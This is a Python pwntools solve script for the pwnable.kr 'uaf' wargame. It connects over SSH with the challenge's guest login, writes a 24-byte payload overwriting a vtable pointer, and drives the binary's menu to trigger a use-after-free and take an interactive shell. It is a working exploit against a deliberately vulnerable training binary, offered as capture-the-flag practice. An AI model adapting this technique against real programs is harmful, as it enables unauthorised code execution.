"""
I understood the basic idea of a use-after-free vulnerability,
but I don't know much about the heap, chunks, or how to examine memory in a C++ binary,
so I read this walkthrough to understand the exploitation:
https://n1ght-w0lf.github.io/binary%20exploitation/uaf/
The author there provides good sources for learning about heap memory.
"""
from pwn import *
def exploit():
    """Run the pwnable.kr ``uaf`` wargame solve over SSH.

    Steps, in order: log in to the wargame host, write a payload file under
    /tmp/whats10/, start ``./uaf`` with a length of ``24`` and the payload
    path as arguments, send the menu choices 3, 2, 2, 1, then hand the
    session over to the user.

    The payload is an 8-byte little-endian value (0x401568) followed by
    16 bytes of 0x90, i.e. 24 bytes, matching the length argument. Why that
    value is used is covered in the walkthrough linked in the module
    docstring; it is specific to this challenge binary.

    Use-after-free is an object-lifetime bug in the target program, so the
    fix belongs there (no use of an object after it has been freed), not in
    anything this script does.
    """
    # Session on the wargame host; credentials are hard-coded in this file.
    remote = ssh(user='uaf', host='pwnable.kr', password='guest', port=2222)

    # Stage the payload file remotely. The one-liner uses Python 2 `print`
    # syntax, so a trailing newline follows the 24 payload bytes.
    # NOTE(review): nothing here waits for this helper to finish before
    # ./uaf is started, and plain `mkdir` stops the `&&` chain when the
    # directory already exists.
    stage_cmd = """mkdir /tmp/whats10/ && cd /tmp/whats10/ && python -c 'print "\\x68\\x15\\x40\\x00\\x00\\x00\\x00\\x00" + "\\x90" * 16' > payload"""
    remote.process(stage_cmd, shell=True)

    # argv for the target: program name, length, payload path.
    target_argv = ['./uaf', '24', '/tmp/whats10/payload']
    target = remote.process(executable='./uaf', argv=target_argv)

    # Menu choices, sent in this exact order; what each number means is
    # defined by the remote binary and is not visible in this file.
    for choice in ('3', '2', '2', '1'):
        target.sendline(choice)

    # Hand the session to the user (the original author reads the flag
    # from here with `cat flag`).
    target.interactive()
if __name__ == "__main__":
    # Run the solve only when executed as a script, never on import.
    exploit()